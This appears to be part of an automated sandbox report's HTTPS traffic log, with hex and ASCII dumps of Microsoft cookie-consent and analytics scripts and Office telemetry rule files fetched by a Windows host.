                                                                                                                                                                                                                                                              2024-11-27 15:32:22 UTC16384INData Raw: 76 61 72 20 57 63 70 43 6f 6e 73 65 6e 74 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 7b 32 32 39 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 77 69 6e 64 6f 77 2c 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 6f 28 6e 29 7b 69 66 28 74 5b 6e 5d 29 72 65 74 75 72 6e 20 74 5b 6e 5d 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 72 3d 74 5b 6e 5d 3d 7b 69 3a 6e 2c 6c 3a 21 31 2c 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 72 65 74 75 72 6e 20 65 5b 6e 5d 2e 63 61 6c 6c 28 72 2e 65 78 70 6f 72 74 73 2c 72 2c 72 2e 65 78 70 6f 72 74 73 2c 6f 29 2c 72 2e 6c 3d 21 30 2c 72 2e 65 78 70 6f 72 74 73 7d 72 65 74 75 72 6e 20 6f 2e 6d 3d 65 2c 6f 2e 63 3d 74 2c 6f 2e 64 3d 66 75 6e 63 74 69 6f 6e 28 65
                                                                                                                                                                                                                                                              Data Ascii: var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e
                                                                                                                                                                                                                                                              2024-11-27 15:32:22 UTC16384INData Raw: 2d 6c 61 62 65 6c 3d 22 27 2b 69 2e 65 73 63 61 70 65 48 74 6d 6c 28 74 68 69 73 2e 74 65 78 74 52 65 73 6f 75 72 63 65 73 2e 70 72 65 66 65 72 65 6e 63 65 73 44 69 61 6c 6f 67 43 6c 6f 73 65 4c 61 62 65 6c 29 2b 27 22 20 63 6c 61 73 73 3d 22 27 2b 61 2e 63 6c 6f 73 65 4d 6f 64 61 6c 49 63 6f 6e 2b 27 22 20 74 61 62 69 6e 64 65 78 3d 22 30 22 3e 26 23 78 32 37 31 35 3b 3c 2f 62 75 74 74 6f 6e 3e 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 72 6f 6c 65 3d 22 64 6f 63 75 6d 65 6e 74 22 20 63 6c 61 73 73 3d 22 27 2b 61 2e 6d 6f 64 61 6c 42 6f 64 79 2b 27 22 3e 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 3e 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 20 63 6c 61 73 73 3d 22 27 2b 61 2e 6d 6f 64
                                                                                                                                                                                                                                                              Data Ascii: -label="'+i.escapeHtml(this.textResources.preferencesDialogCloseLabel)+'" class="'+a.closeModalIcon+'" tabindex="0">&#x2715;</button>\n <div role="document" class="'+a.modalBody+'">\n <div>\n <h1 class="'+a.mod
                                                                                                                                                                                                                                                              2024-11-27 15:32:23 UTC16384INData Raw: 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 22 2b 65 5b 22 72 61 64 69 6f 2d 62 75 74 74 6f 6e 2d 64 69 73 61 62 6c 65 64 2d 63 6f 6c 6f 72 22 5d 2b 22 20 21 69 6d 70 6f 72 74 61 6e 74 3b 5c 6e 20 20 20 20 20 20 20 20 7d 22 7d 2c 65 7d 28 29 2c 64 3d 5b 22 61 72 22 2c 22 68 65 22 2c 22 70 73 22 2c 22 75 72 22 2c 22 66 61 22 2c 22 70 61 22 2c 22 73 64 22 2c 22 74 6b 22 2c 22 75 67 22 2c 22 79 69 22 2c 22 73 79 72 22 2c 22 6b 73 2d 61 72 61 62 22 5d 2c 75 3d 7b 22 63 6c 6f 73 65 2d 62 75 74 74 6f 6e 2d 63 6f 6c 6f 72 22 3a 22 23 36 36 36 36 36 36 22 2c 22 73 65 63 6f 6e 64 61 72 79 2d 62 75 74 74 6f 6e 2d 64 69 73 61 62 6c 65 64 2d 6f 70 61 63 69 74 79 22 3a 22 31 22 2c 22 73 65 63 6f 6e 64 61 72 79 2d 62 75 74 74 6f 6e 2d
                                                                                                                                                                                                                                                              Data Ascii: background-color: "+e["radio-button-disabled-color"]+" !important;\n }"},e}(),d=["ar","he","ps","ur","fa","pa","sd","tk","ug","yi","syr","ks-arab"],u={"close-button-color":"#666666","secondary-button-disabled-opacity":"1","secondary-button-
                                                                                                                                                                                                                                                              2024-11-27 15:32:23 UTC3565INData Raw: 2d 22 29 5b 30 5d 3b 6f 3d 65 2e 73 70 6c 69 74 28 22 2d 22 29 5b 30 5d 3d 3d 3d 6e 7d 72 65 74 75 72 6e 20 6f 7d 28 65 2c 63 29 7d 29 29 3b 73 26 26 30 3d 3d 3d 73 2e 6c 65 6e 67 74 68 26 26 28 65 3d 22 65 6e 2d 55 53 22 29 2c 6f 2e 70 6c 61 63 65 68 6f 6c 64 65 72 45 6c 65 6d 65 6e 74 3d 6c 2c 72 26 26 6f 2e 63 6f 6e 73 65 6e 74 43 68 61 6e 67 65 64 43 61 6c 6c 62 61 63 6b 73 2e 72 65 67 69 73 74 65 72 43 61 6c 6c 62 61 63 6b 28 72 29 2c 6f 2e 73 61 76 65 43 6f 6f 6b 69 65 28 29 2c 6f 2e 73 69 74 65 43 6f 6e 73 65 6e 74 3d 6e 65 77 20 66 28 21 31 29 2c 6e 75 6c 6c 3d 3d 6e 7c 7c 6e 28 76 6f 69 64 20 30 2c 6f 2e 73 69 74 65 43 6f 6e 73 65 6e 74 29 2c 6f 2e 69 73 49 6e 69 74 52 65 61 64 79 3d 21 30 2c 74 68 69 73 2e 63 6f 6e 73 65 6e 74 43 68 61 6e 67 65
                                                                                                                                                                                                                                                              Data Ascii: -")[0];o=e.split("-")[0]===n}return o}(e,c)}));s&&0===s.length&&(e="en-US"),o.placeholderElement=l,r&&o.consentChangedCallbacks.registerCallback(r),o.saveCookie(),o.siteConsent=new f(!1),null==n||n(void 0,o.siteConsent),o.isInitReady=!0,this.consentChange


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              142192.168.2.104987413.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:32:22 UTC192OUTGET /rules/rule700500v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:32:22 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:32:22 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 1368
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582BE51CE7B3"
                                                                                                                                                                                                                                                              x-ms-request-id: af0b01d9-401e-0035-6c5f-4082d8000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153222Z-174f7845968kdththC1EWRzvxn00000009k0000000002qfx
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:32:22 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 6f 77 65 72 50 6f 69 6e 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPowerPoint" S="Medium" /> <F T=


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              143192.168.2.104987513.107.246.634434228C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:32:22 UTC370OUTGET /scripts/c/ms.jsll-4.min.js HTTP/1.1
                                                                                                                                                                                                                                                              Host: js.monitor.azure.com
                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                              2024-11-27 15:32:22 UTC889INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:32:22 GMT
                                                                                                                                                                                                                                                              Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                              Content-Length: 207935
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Cache-Control: no-transform, public, max-age=1800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Mon, 14 Oct 2024 17:27:31 GMT
                                                                                                                                                                                                                                                              ETag: 0x8DCEC757C1AD1D1
                                                                                                                                                                                                                                                              x-ms-request-id: 24663fe8-301e-00d3-0bb2-2cfca8000000
                                                                                                                                                                                                                                                              x-ms-version: 2009-09-19
                                                                                                                                                                                                                                                              x-ms-meta-jssdkver: 4.3.3
                                                                                                                                                                                                                                                              x-ms-meta-jssdksrc: [cdn]/scripts/c/ms.jsll-4.3.3.min.js
                                                                                                                                                                                                                                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,x-ms-meta-jssdkver,x-ms-meta-jssdksrc,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153222Z-174f7845968l4kp6hC1EWRe8840000000xe0000000005a1z
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:32:22 UTC15495INData Raw: 2f 2a 21 0a 20 2a 20 31 44 53 20 4a 53 4c 4c 20 53 4b 55 2c 20 34 2e 33 2e 33 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 4d 69 63 72 6f 73 6f 66 74 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 0a 20 2a 20 28 4d 69 63 72 6f 73 6f 66 74 20 49 6e 74 65 72 6e 61 6c 20 4f 6e 6c 79 29 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 75 6e 64 65 66 69 6e 65 64 22 3b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 21 3d 6e 29 74 28 65 78 70 6f 72 74 73 29 3b 65 6c 73 65 20 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69
                                                                                                                                                                                                                                                              Data Ascii: /*! * 1DS JSLL SKU, 4.3.3 * Copyright (c) Microsoft and contributors. All rights reserved. * (Microsoft Internal Only) */!function(e,t){var n="undefined";if("object"==typeof exports&&typeof module!=n)t(exports);else if("function"==typeof define&&defi
                                                                                                                                                                                                                                                              2024-11-27 15:32:23 UTC16384INData Raw: 28 69 29 3a 28 72 3d 66 65 28 22 63 6f 6e 73 6f 6c 65 22 29 29 26 26 28 72 2e 65 72 72 6f 72 7c 7c 72 2e 6c 6f 67 29 28 74 2c 63 65 28 69 29 29 29 29 7d 53 65 28 61 3d 7b 74 68 65 6e 3a 6f 2c 22 63 61 74 63 68 22 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6f 28 75 6e 64 65 66 69 6e 65 64 2c 65 29 7d 2c 22 66 69 6e 61 6c 6c 79 22 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 2c 6e 3d 74 3b 72 65 74 75 72 6e 20 51 28 74 29 26 26 28 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 26 26 74 28 29 2c 65 7d 2c 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 68 72 6f 77 20 74 26 26 74 28 29 2c 65 7d 29 2c 6f 28 65 2c 6e 29 7d 7d 2c 22 73 74 61 74 65 22 2c 7b 67 65 74 3a 64 7d 29 2c 68 74 28 29 26 26 28 61 5b 6d 74 28
                                                                                                                                                                                                                                                              Data Ascii: (i):(r=fe("console"))&&(r.error||r.log)(t,ce(i))))}Se(a={then:o,"catch":function(e){return o(undefined,e)},"finally":function(t){var e=t,n=t;return Q(t)&&(e=function(e){return t&&t(),e},n=function(e){throw t&&t(),e}),o(e,n)}},"state",{get:d}),ht()&&(a[mt(
                                                                                                                                                                                                                                                              2024-11-27 15:32:23 UTC16384INData Raw: 28 65 2c 74 2c 6e 2c 72 29 7b 67 65 28 65 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 26 26 65 5b 74 5d 26 26 28 6e 3f 28 6e 2e 63 62 5b 74 65 5d 28 7b 66 6e 3a 72 2c 61 72 67 3a 65 7d 29 2c 6e 2e 68 3d 6e 2e 68 7c 7c 6e 6e 28 70 63 2c 30 2c 6e 29 29 3a 4d 28 72 2c 5b 65 5d 29 29 7d 29 7d 68 63 2e 5f 5f 69 65 44 79 6e 3d 31 3b 76 61 72 20 76 63 3d 68 63 3b 66 75 6e 63 74 69 6f 6e 20 68 63 28 65 29 7b 74 68 69 73 2e 6c 69 73 74 65 6e 65 72 73 3d 5b 5d 3b 76 61 72 20 6e 2c 69 3d 5b 5d 2c 61 3d 7b 68 3a 6e 75 6c 6c 2c 63 62 3a 5b 5d 7d 2c 6f 3d 76 6f 28 65 2c 64 63 29 5b 4b 6e 5d 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6e 3d 21 21 65 2e 63 66 67 2e 70 65 72 66 45 76 74 73 53 65 6e 64 41 6c 6c 7d 29 3b 76 65 28 68 63 2c 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28
                                                                                                                                                                                                                                                              Data Ascii: (e,t,n,r){ge(e,function(e){e&&e[t]&&(n?(n.cb[te]({fn:r,arg:e}),n.h=n.h||nn(pc,0,n)):M(r,[e]))})}hc.__ieDyn=1;var vc=hc;function hc(e){this.listeners=[];var n,i=[],a={h:null,cb:[]},o=vo(e,dc)[Kn](function(e){n=!!e.cfg.perfEvtsSendAll});ve(hc,this,function(
                                                                                                                                                                                                                                                              2024-11-27 15:32:23 UTC16384INData Raw: 28 65 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 61 2e 66 6c 75 73 68 43 6f 6d 70 6c 65 74 65 3d 65 2c 50 3d 21 30 2c 52 2e 72 75 6e 28 6f 2c 61 29 2c 66 5b 67 72 5d 28 29 2c 6f 5b 6c 72 5d 28 61 29 7d 2c 36 2c 6e 29 2c 69 7d 2c 66 5b 6f 72 5d 3d 73 2c 66 2e 61 64 64 50 6c 75 67 69 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 2c 72 29 7b 69 66 28 21 65 29 72 65 74 75 72 6e 20 72 26 26 72 28 21 31 29 2c 76 6f 69 64 20 43 28 6f 75 29 3b 76 61 72 20 69 3d 73 28 65 5b 24 6e 5d 29 3b 69 66 28 69 26 26 21 74 29 72 65 74 75 72 6e 20 72 26 26 72 28 21 31 29 2c 76 6f 69 64 20 43 28 22 50 6c 75 67 69 6e 20 5b 22 2b 65 5b 24 6e 5d 2b 22 5d 20 69 73 20 61 6c 72 65 61 64 79 20 6c 6f 61 64 65 64 21 22 29 3b 76 61 72 20 61 2c 6f 3d 7b 72 65 61 73 6f 6e 3a 31 36 7d 3b 66
                                                                                                                                                                                                                                                              Data Ascii: (e,function(e){a.flushComplete=e,P=!0,R.run(o,a),f[gr](),o[lr](a)},6,n),i},f[or]=s,f.addPlugin=function(e,t,n,r){if(!e)return r&&r(!1),void C(ou);var i=s(e[$n]);if(i&&!t)return r&&r(!1),void C("Plugin ["+e[$n]+"] is already loaded!");var a,o={reason:16};f
                                                                                                                                                                                                                                                              2024-11-27 15:32:23 UTC16384INData Raw: 6c 3a 31 2c 43 72 69 74 69 63 61 6c 3a 32 7d 29 2c 75 6e 64 65 66 69 6e 65 64 2c 75 6e 64 65 66 69 6e 65 64 29 2c 53 6c 3d 22 22 3b 66 75 6e 63 74 69 6f 6e 20 78 6c 28 65 29 7b 74 72 79 7b 69 66 28 6f 65 28 6f 74 28 29 29 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 76 61 72 20 74 3d 28 6e 65 77 20 44 61 74 65 29 5b 4f 73 5d 28 29 2c 6e 3d 66 65 28 65 3d 3d 3d 45 6c 2e 4c 6f 63 61 6c 53 74 6f 72 61 67 65 3f 22 6c 6f 63 61 6c 53 74 6f 72 61 67 65 22 3a 22 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 22 29 2c 72 3d 53 6c 2b 74 2c 69 3d 28 6e 2e 73 65 74 49 74 65 6d 28 72 2c 74 29 2c 6e 2e 67 65 74 49 74 65 6d 28 72 29 21 3d 3d 74 29 3b 69 66 28 6e 5b 52 73 5d 28 72 29 2c 21 69 29 72 65 74 75 72 6e 20 6e 7d 63 61 74 63 68 28 61 29 7b 7d 72 65 74 75 72 6e 20 6e 75 6c
                                                                                                                                                                                                                                                              Data Ascii: l:1,Critical:2}),undefined,undefined),Sl="";function xl(e){try{if(oe(ot()))return null;var t=(new Date)[Os](),n=fe(e===El.LocalStorage?"localStorage":"sessionStorage"),r=Sl+t,i=(n.setItem(r,t),n.getItem(r)!==t);if(n[Rs](r),!i)return n}catch(a){}return nul
                                                                                                                                                                                                                                                              2024-11-27 15:32:23 UTC16384INData Raw: 6f 20 74 72 61 63 6b 20 70 61 67 65 20 76 69 73 69 74 20 74 69 6d 65 20 66 61 69 6c 65 64 2c 20 6d 65 74 72 69 63 20 77 69 6c 6c 20 6e 6f 74 20 62 65 20 63 6f 6c 6c 65 63 74 65 64 3a 20 22 2b 63 65 28 72 29 29 7d 7d 2c 59 28 65 2c 22 5f 6c 6f 67 67 65 72 22 2c 7b 67 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 7d 7d 29 2c 59 28 65 2c 22 70 61 67 65 56 69 73 69 74 54 69 6d 65 54 72 61 63 6b 69 6e 67 48 61 6e 64 6c 65 72 22 2c 7b 67 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 63 7d 7d 29 7d 29 7d 76 61 72 20 4e 64 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 74 68 69 73 5b 67 64 5d 3d 50 74 28 29 2c 74 68 69 73 2e 70 61 67 65 4e 61 6d 65 3d 65 2c 74 68 69 73 2e 70 61 67 65 55 72 6c 3d 74 7d 2c 44 64 3d 66 75 6e 63 74 69 6f 6e 28
                                                                                                                                                                                                                                                              Data Ascii: o track page visit time failed, metric will not be collected: "+ce(r))}},Y(e,"_logger",{g:function(){return o}}),Y(e,"pageVisitTimeTrackingHandler",{g:function(){return c}})})}var Nd=function(e,t){this[gd]=Pt(),this.pageName=e,this.pageUrl=t},Dd=function(
                                                                                                                                                                                                                                                              2024-11-27 15:32:23 UTC16384INData Raw: 63 6f 72 65 44 61 74 61 2c 22 62 65 68 61 76 69 6f 72 22 29 2c 75 65 28 6e 2e 70 61 67 65 54 79 70 65 29 26 26 28 65 2e 70 61 67 65 54 79 70 65 3d 6e 2e 70 61 67 65 54 79 70 65 29 2c 75 65 28 72 2e 5f 70 61 67 65 54 79 70 65 4d 65 74 61 54 61 67 29 26 26 21 75 65 28 65 2e 70 61 67 65 54 79 70 65 29 26 26 28 65 2e 70 61 67 65 54 79 70 65 3d 72 2e 5f 70 61 67 65 54 79 70 65 4d 65 74 61 54 61 67 29 2c 75 65 28 72 2e 5f 6d 61 72 6b 65 74 4d 65 74 61 54 61 67 29 26 26 28 65 2e 6d 61 72 6b 65 74 3d 72 2e 5f 6d 61 72 6b 65 74 4d 65 74 61 54 61 67 29 2c 65 2e 69 73 4c 6f 67 67 65 64 49 6e 3d 47 64 28 72 2e 5f 63 6f 6e 66 69 67 29 2c 74 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 3d 6f 63 28 29 7d 2c 69 70 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 73 65 74 50 61 67 65 54
                                                                                                                                                                                                                                                              Data Ascii: coreData,"behavior"),ue(n.pageType)&&(e.pageType=n.pageType),ue(r._pageTypeMetaTag)&&!ue(e.pageType)&&(e.pageType=r._pageTypeMetaTag),ue(r._marketMetaTag)&&(e.market=r._marketMetaTag),e.isLoggedIn=Gd(r._config),t.cookieEnabled=oc()},ip.prototype._setPageT
                                                                                                                                                                                                                                                              2024-11-27 15:32:23 UTC16384INData Raw: 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 2c 41 70 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 69 73 54 72 61 63 6b 65 64 57 69 74 68 44 61 74 61 42 69 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 65 2e 61 74 74 72 69 62 75 74 65 73 2c 6e 3d 30 3b 6e 3c 74 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 69 66 28 7e 74 5b 6e 5d 2e 6e 61 6d 65 2e 69 6e 64 65 78 4f 66 28 22 64 61 74 61 2d 62 69 2d 22 29 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 2c 41 70 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 69 73 54 72 61 63 6b 65 64 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 65 2e 61 74 74 72 69 62 75 74 65 73 2c 6e 3d 30 3b 6e 3c 74 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 69 66 28 22 64 61 74 61 2d 6d 22 3d 3d 3d 74 5b 6e 5d 2e 6e 61 6d
                                                                                                                                                                                                                                                              Data Ascii: n!0;return!1},Ap.prototype._isTrackedWithDataBi=function(e){for(var t=e.attributes,n=0;n<t.length;n++)if(~t[n].name.indexOf("data-bi-"))return!0;return!1},Ap.prototype._isTracked=function(e){for(var t=e.attributes,n=0;n<t.length;n++)if("data-m"===t[n].nam
                                                                                                                                                                                                                                                              2024-11-27 15:32:23 UTC16384INData Raw: 75 74 68 54 6f 6b 65 6e 22 2c 61 3d 22 41 75 74 68 58 54 6f 6b 65 6e 22 2c 67 67 3d 22 6d 73 66 70 63 22 2c 76 67 3d 22 75 73 65 72 22 2c 68 67 3d 22 61 6c 6c 6f 77 52 65 71 75 65 73 74 53 65 6e 64 69 6e 67 22 2c 6d 67 3d 22 66 69 72 73 74 52 65 71 75 65 73 74 53 65 6e 74 22 2c 79 67 3d 22 73 68 6f 75 6c 64 41 64 64 43 6c 6f 63 6b 53 6b 65 77 48 65 61 64 65 72 73 22 2c 43 67 3d 22 67 65 74 43 6c 6f 63 6b 53 6b 65 77 48 65 61 64 65 72 56 61 6c 75 65 22 2c 62 67 3d 22 73 65 74 43 6c 6f 63 6b 53 6b 65 77 22 2c 79 65 3d 22 6c 65 6e 67 74 68 22 2c 54 67 3d 22 63 6f 6e 63 61 74 22 2c 49 67 3d 22 69 4b 65 79 22 2c 45 67 3d 22 63 6f 75 6e 74 22 2c 5f 67 3d 22 65 76 65 6e 74 73 22 2c 53 67 3d 22 70 75 73 68 22 2c 78 67 3d 22 73 70 6c 69 74 22 2c 4e 67 3d 22 73 70
                                                                                                                                                                                                                                                              Data Ascii: uthToken",a="AuthXToken",gg="msfpc",vg="user",hg="allowRequestSending",mg="firstRequestSent",yg="shouldAddClockSkewHeaders",Cg="getClockSkewHeaderValue",bg="setClockSkew",ye="length",Tg="concat",Ig="iKey",Eg="count",_g="events",Sg="push",xg="split",Ng="sp
                                                                                                                                                                                                                                                              2024-11-27 15:32:23 UTC16384INData Raw: 29 29 2c 65 5b 6c 76 5d 26 26 28 65 5b 6c 76 5d 3d 65 61 28 65 5b 6c 76 5d 29 29 29 7d 66 75 6e 63 74 69 6f 6e 20 61 28 65 2c 74 29 7b 69 66 28 65 5b 79 76 5d 7c 7c 28 65 5b 79 76 5d 3d 30 29 2c 65 5b 43 76 5d 7c 7c 28 65 5b 43 76 5d 3d 31 29 2c 6c 28 65 29 2c 65 5b 62 76 5d 29 69 66 28 55 7c 7c 61 65 29 65 5b 43 76 5d 3d 33 2c 65 5b 62 76 5d 3d 21 31 3b 65 6c 73 65 20 69 66 28 48 29 72 65 74 75 72 6e 20 57 26 26 28 65 3d 65 61 28 65 29 29 2c 48 5b 72 76 5d 28 45 76 2e 63 72 65 61 74 65 28 65 5b 49 67 5d 2c 5b 65 5d 29 2c 21 30 3d 3d 3d 65 5b 62 76 5d 3f 31 3a 65 5b 62 76 5d 2c 33 29 3b 76 61 72 20 6e 3d 65 5b 43 76 5d 2c 72 3d 63 65 2c 69 3d 52 2c 61 3d 28 34 3d 3d 3d 6e 26 26 28 72 3d 6f 65 2c 69 3d 4f 29 2c 21 31 29 3b 72 3c 69 3f 61 3d 21 43 28 65 2c
                                                                                                                                                                                                                                                              Data Ascii: )),e[lv]&&(e[lv]=ea(e[lv])))}function a(e,t){if(e[yv]||(e[yv]=0),e[Cv]||(e[Cv]=1),l(e),e[bv])if(U||ae)e[Cv]=3,e[bv]=!1;else if(H)return W&&(e=ea(e)),H[rv](Ev.create(e[Ig],[e]),!0===e[bv]?1:e[bv],3);var n=e[Cv],r=ce,i=R,a=(4===n&&(r=oe,i=O),!1);r<i?a=!C(e,


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              144192.168.2.104987613.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:32:22 UTC192OUTGET /rules/rule702551v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:32:23 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:32:23 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 1415
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582BDCE9703A"
                                                                                                                                                                                                                                                              x-ms-request-id: 1f804e14-301e-003f-7366-40266f000000
